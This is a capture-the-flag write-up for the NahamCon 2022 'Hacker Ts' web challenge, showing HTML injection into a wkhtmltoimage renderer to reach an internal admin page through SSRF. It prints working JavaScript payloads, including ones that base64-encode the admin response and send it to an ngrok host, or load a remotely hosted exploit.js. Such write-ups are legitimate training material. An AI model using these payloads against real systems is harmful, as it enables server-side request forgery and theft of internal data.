1 minute read

Nahamcon ctf 2022 was held from the 28th of April Until the 30th of the month , and we have participated under the team 0xcha0s. this challenge idea was pretty new to me so it is helpful to document it in this writeup

   
CTF name NahamconCTF 2022
challenge Hacker Ts
category web
about HTML injection
team 0xCha0s

we are introduced with this page , it can take a text as input and we can also specify the color

error

  • and the output is :

error

  • Also we can see the Admin tab above it shows the following :

error

  • So our goal is to view the admin page , mentioning the localhost:5000 should trigger you for SSRF most likely.

  • We can try to inject html code and see if it gets rendered <h1>test</h1>

error

  • and it worked indeed , we can try to execute some JS , start with <script>alert(1);</script> But it shows empty t-shirt
  • we can try :
<p id="test">aa</p>
<script>
  document.getElementById("test").innerHTML += window.location;
</script>

error

  • we can try to trigger an error while processing to get more information with replacing test with X

error

  • we got this error , we know it uses wkhtmltoimage to make the process , searching for it found the following articles :

  • Nahmasec
  • here

  • Hacktricks

  • we can craft payloads to make it visit the admin page and view the response for us :

Approach 1

<h1 id="0xMesbaha"></h1>
<script>
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "http://localhost:5000/admin", false);
  xhr.send();
  document.getElementById("0xMesbaha").innerHTML = xhr.responseText;
</script>

the false in xhr.open :

async parameter which is optional , If this value is false, the send() method does not return until the response is received.

error

Approach 2

  • we can also use other payload to take the response then send it to remote server :
  • in the text input :
<script>
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "http://localhost:5000/admin");
  xhr.onload = function () {
    var flag = btoa(xhr.responseText);
    var exfil = new XMLHttpRequest();
    exfil.open("GET", "http://ee3f-156-194-180-190.ngrok.io/?flag=" + flag);
    exfil.send();
  };
  xhr.send();
</script>

error

  • decode it :

error

Approach 3

  • we can also go to another approach , which is hosting exploit.js contains :
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://localhost:5000/admin");
xhr.onload = function () {
  var flag = btoa(xhr.responseText);
  var exfil = new XMLHttpRequest();
  exfil.open("GET", "http://6ce0-156-194-180-190.ngrok.io/?flag=" + flag);
  exfil.send();
};
xhr.send();
  • then on the text input use :
<script src="http://6ce0-156-194-180-190.ngrok.io/exploit.js"></script>
  • same output :

error

You May Also Enjoy

JustCTF Extra Safe Security Layers writeup

5 minute read

This Challenge is about exploiting cross site scripting with a strict CSP in place along with XSS Santizer and other restrictions , the interesting part in t...

Open Source HackTheBox Writeup

4 minute read

In This Box we are facing interesting Stuff like Docker , git hooks and other stuff. first we got access to a docker in the machine by overwritting the appli...

meme generator challenge writeup

2 minute read

This challenge was in Blackhat CTF Qualifications 2022 and we have participated under the team 0xCha0s, we have managed to solve multiple challenges. this ch...

Timelapse Hackthebox writeup

4 minute read

In this Box we are against a windows machine has the active directory service installed on it , we can list files on smb shares and access some shared folder...